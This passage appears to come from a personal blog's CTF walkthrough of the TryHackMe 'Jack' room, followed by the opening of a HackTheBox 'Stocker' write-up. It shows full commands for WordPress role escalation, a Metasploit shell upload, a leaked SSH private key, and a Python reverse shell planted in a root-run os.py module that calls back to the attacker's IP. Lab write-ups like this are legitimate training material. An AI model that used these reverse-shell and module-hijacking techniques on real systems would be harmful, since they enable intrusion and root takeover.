 | Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 09:44:25 2023
[+] Requests Done: 785
[+] Cached Requests: 39
[+] Data Sent: 363.358 KB
[+] Data Received: 445.969 KB
[+] Memory used: 283.125 MB
[+] Elapsed time: 00:02:24

Ok we found 1 password for Wendy.

NOTE: If you are struggling with this one. You won’t find the password with rockyou. In fact I finally used another wordlist that I created based on a munge of some of the most used passwords.

Initial Web Login

Logging in I see this:

So we aren’t a full administrator here. Since we cannot access some of the pages like 404 etc, it may not be possible to upload a php reverse shell.

Checking for some exploits here. I saw a hint on the THM site about ‘ ure_other_roles’.

Escalate to Web Admin

After doing a fair bit of reading, I found that there is a plugin for WordPress referenced by the string mentioned above. I found that we can simply navigate to the profiles page, and open BurpSuite, and capture the request when we click update profile. Then, before forwarding, we just send &ure_other_roles=administrator and forward all other requests:

Now we see we have access to the other pages:

While we are here let’s change the default user role for Wendy:

Now if we have to log back in we’ll have admin. I did try this once to be sure, and I got a email verification page so I recommend you test this so your exploit won’t fail.

Initial Box Access

Now I’ll just use Meterpreter to get a reverse shell:

 kali@kalia  ~/curr  msfconsole -q
msf6 > search wp_admin_shell

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                         using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.11.62    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD changelater
PASSWORD => changelater
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS http://jack.thm/
RHOSTS => http://jack.thm/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME wendy
USERNAME => wendy
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => 10.19.10.150
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURL /wp-admin
[!] Unknown datastore option: TARGETURL. Did you mean TARGET?
TARGETURL => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wp-admin
TARGETURI => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/gLvyBKxzbo/RrpHIxAzSU.php...
[*] Sending stage (39927 bytes) to 10.10.13.248
[+] Deleted RrpHIxAzSU.php
[+] Deleted gLvyBKxzbo.php
[+] Deleted ../gLvyBKxzbo
[*] Meterpreter session 1 opened (10.19.10.150:4444 -> 10.10.13.248:52428) at 2023-11-12 10:28:20 +0900


meterpreter > ls
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cd ..
meterpreter > ls
Listing: /var/www/html/wp-content/plugins
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
042775/rwxrwxr-x  4096  dir   2020-01-11 06:00:27 +0900  akismet
100664/rw-rw-r--  2255  fil   2013-05-23 06:08:40 +0900  hello.php
100664/rw-rw-r--  28    fil   2014-06-06 00:59:14 +0900  index.php
042755/rwxr-xr-x  4096  dir   2020-01-10 22:35:54 +0900  user-role-editor

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > who
[-] Unknown command: who
meterpreter > w
[-] Unknown command: w
meterpreter > shell
Process 2519 created.
Channel 0 created.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jack:/var/www/html/wp-content/plugins$

First Flag

Now navigate to the user home:

www-data@jack:/home/jack$ ls
ls
reminder.txt  user.txt
www-data@jack:/home/jack$ cat user.txt
cat user.txt
0052f7829e48752f2e7bf50f1231548a

Ok we got the user flag.

Let’s Enumerate for something we can use to pivot or privesc.

Let’s setup a web server with Linpeas.sh

```bash
kali@kalia  ~/curr/source  cp /home/kali/Downloads/linpeas.sh .
kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.13.248 - - [12/Nov/2023 10:35:54] "GET /linpeas.sh HTTP/1.1" 200 -

Now on the Victim:

bash
cd /dev/shm
www-data@jack:/dev/shm$ wget http://10.19.10.150/linpeas.sh
wget http://10.19.10.150/linpeas.sh
--2023-11-11 19:35:54-- http://10.19.10.150/linpeas.sh
Connecting to 10.19.10.150:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 848317 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh 100%[===================>] 828.43K 417KB/s in 2.0s

2023-11-11 19:35:57 (417 KB/s) - 'linpeas.sh' saved [848317/848317]

www-data@jack:/dev/shm$ ls
ls
linpeas.sh
www-data@jack:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh

First User Access

After running that we find an ssh key:

bash
╔══════════╣ Analyzing SSH Files (limit 70)

-rwxrwxrwx 1 root root 1675 Jan 10 2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

```

Now I drop that file on my local box:

 ✘ kali@kalia  ~/curr  cat ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

kali@kalia  ~/curr/ssh  chmod 0600 ssh/id_rsa

Now let’s try to use it to login and get a proper shell:

kali@kalia  ~/curr  ssh -i ssh/id_rsa jack@$IP                  
The authenticity of host '10.10.13.248 (10.10.13.248)' can't be established.
ED25519 key fingerprint is SHA256:91RPPbrI5UuL0FaDNrDEVlL+bIOB9YABCTtC3ttyW1U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.13.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

143 packages can be updated.
92 updates are security updates.


Last login: Mon Nov 16 14:27:49 2020 from 10.11.12.223
jack@jack:~$

Second Enumeration

I run Linpeas again here as I am now properly logged in as the Jack user:

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                     
/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                  

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[..]

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/statuscheck/output.log                                                                                                 
/var/log/auth.log
/var/log/apache2/access.log
/var/log/syslog
/home/jack/.config/lxc/client.crt
/home/jack/.config/lxc/client.key
/home/jack/.gnupg/gpg.conf
/home/jack/.gnupg/trustdb.gpg
/home/jack/.gnupg/pubring.gpg

[..]

╔══════════╣ Analyzing SSH Files (limit 70)                                                                                 

-rw------- 1 jack jack 1675 Jan 10  2020 /home/jack/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----



-rw-rw-r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack

Now tried to login as both jack and root on both those SSH keys. Root requires password so I wasn’t able to use that. Jack can login on either key without a password.

Checking out his home directory I saw 1 other interesting file:

jack@jack:~$ cat reminder.txt 

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

Ok.. so I seem to be getting pointed to backups again.

I want to check out the interesting files modified in the last 5 mins. This one looks very interesting:

/opt/statuscheck/output.log

Hmm this room said hack python to gain root. I’d say this is our most likely vector:

jack@jack:~$ cd /opt/statuscheck/
jack@jack:/opt/statuscheck$ ls
checker.py  output.log
jack@jack:/opt/statuscheck$ cat output.log 

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:46:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
[..]

So that python script runs once a min. I think we can exploit that somehow since Root is running it.

Checking out that /var/backups directory:

www-data@jack:/dev/shm$ ls -al /var/backups
ls -al /var/backups
total 776
drwxr-xr-x  2 root root     4096 Jan 10  2020 .
drwxr-xr-x 14 root root     4096 Jan  9  2020 ..
-rw-r--r--  1 root root    40960 Jan  9  2020 alternatives.tar.0
-rw-r--r--  1 root root     9931 Jan  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      713 Jan  8  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root       11 Jan  8  2020 dpkg.arch.0
-rw-r--r--  1 root root       43 Jan  8  2020 dpkg.arch.1.gz
-rw-r--r--  1 root root      437 Jan  8  2020 dpkg.diversions.0
-rw-r--r--  1 root root      202 Jan  8  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      207 Jan  9  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      129 Jan  8  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root   552673 Jan  9  2020 dpkg.status.0
-rw-r--r--  1 root root   129487 Jan  8  2020 dpkg.status.1.gz
-rw-------  1 root root      802 Jan  9  2020 group.bak
-rw-------  1 root shadow    672 Jan  9  2020 gshadow.bak
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow    969 Jan  9  2020 shadow.bak

Important passwd and shadow but it’s only root access. Also the id_rsa that Linpeas found previously.

It seems like we can write to a lot of stuff based on the output of Linpeas. I want to check what groups we are part of:

jack@jack:/opt/statuscheck$ groups
jack adm cdrom dip plugdev lpadmin sambashare family

Now what does that family group give us access to write/read. It seems to be the only real interesting one as the others are common groups:

jack@jack:/opt/statuscheck$ find / -group family 2>/dev/null
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
/usr/lib/python2.7/sgmllib.pyc
[.. 200 more..]

/usr/lib/python2.7/os.py
/usr/lib/python2.7/posixpath.py
/usr/lib/python2.7/io.pyc
/usr/lib/python2.7/traceback.pyc
/usr/lib/python2.7/asyncore.py
/usr/lib/python2.7/popen2.py
/usr/lib/python2.7/zipfile.pyc
/usr/lib/python2.7/doctest.pyc
/usr/lib/python2.7/getpass.pyc
/usr/lib/python2.7/smtplib.py
/etc/python2.7/sitecustomize.py

Wow.. not good. We can actually write to ALL of these python modules. The room title makes sense now. All too easy.

PrivEsc

Ok let’s grab a Python reverse shell:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

And I use this one:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.19.10.150",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I put that in the bottom of the os.py file:

try:
    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                     _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass

# -- My treacherous additions mohaha
import socket,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.19.10.150",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/sh")

I modified it to not import os since we already import it above. Also removed the os. from the dup2 refs since it’s not needed, and of course split it up to make it look readable, and finally put my own IP and port for the callback.

Next start a listener and wait:

✘ kali@kalia  ~  ~/bin/revs 4444
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.19.10.150] from (UNKNOWN) [10.10.13.248] 52586
# whoami
whoami
root
#

NOTE: If you have trouble, you can just run python with no options as jack and it will fail citing the error and line number in the os.py file 🙂 You’re welcome. It will connect as jack once your test succeeds. Just kill that since we want root to connect back to us.

Once you get it fixed, restart your reverse listener and wait for the root shell to connect to you.

Last Flag

# whoami
whoami
root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b8b63a861cc09e853f29d8055d64bffb
#

Anyway there we have it, we have our root shell and can get the flag.

Usernames:

jack              #wp user
wendy:changelater #wp user
danny             #wp user

Conclusion

This was a really fun room. Not your standard WordPress hack. I actually had to go through a few user lists which a I thought was lame. NOTE to CTF creators: You don’t make a room harder by making the password further down a userlist or just adding the password to something obscure. I went through the entire rockyou.txt and then tried some other ones I’ve created in the past for most common and that’s how I found wendy’s password. If anyone tries to use Rockyou.txt, don’t bother, the password isn’t there.

The rest of the room was textbook – though a little more hard than just Linpeas, gtfobins and done. It was still easy.

Initial Difficulty: 5/10
Overall Difficulty: 5/10
Fun Level: 8/10

HackTheBox – Stocker

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
